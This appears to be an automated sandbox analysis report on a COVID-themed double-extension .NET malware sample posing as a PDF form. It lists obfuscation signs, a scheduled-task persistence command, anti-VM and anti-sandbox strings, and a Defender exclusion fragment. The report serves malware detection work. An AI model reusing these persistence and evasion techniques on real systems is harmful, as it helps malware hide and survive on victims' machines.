Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs | High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs | High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs | High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File created: C:\Users\user\AppData\Roaming\qvDFOnW.exe

                Boot Survival:

                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'

                Hooking and other Techniques for Hiding and Protection:

                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exe | Static PE information: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion:

                Yara detected AntiVM3
                Source: Yara match | File source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5700 | Thread sleep time: -42124s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5920 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 3164 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5224 | Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 6_2_00403D74
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Thread delayed: delay time: 42124
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 60000Jump to behavior
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228699626.0000000006C9C000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:ringFileInfo
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
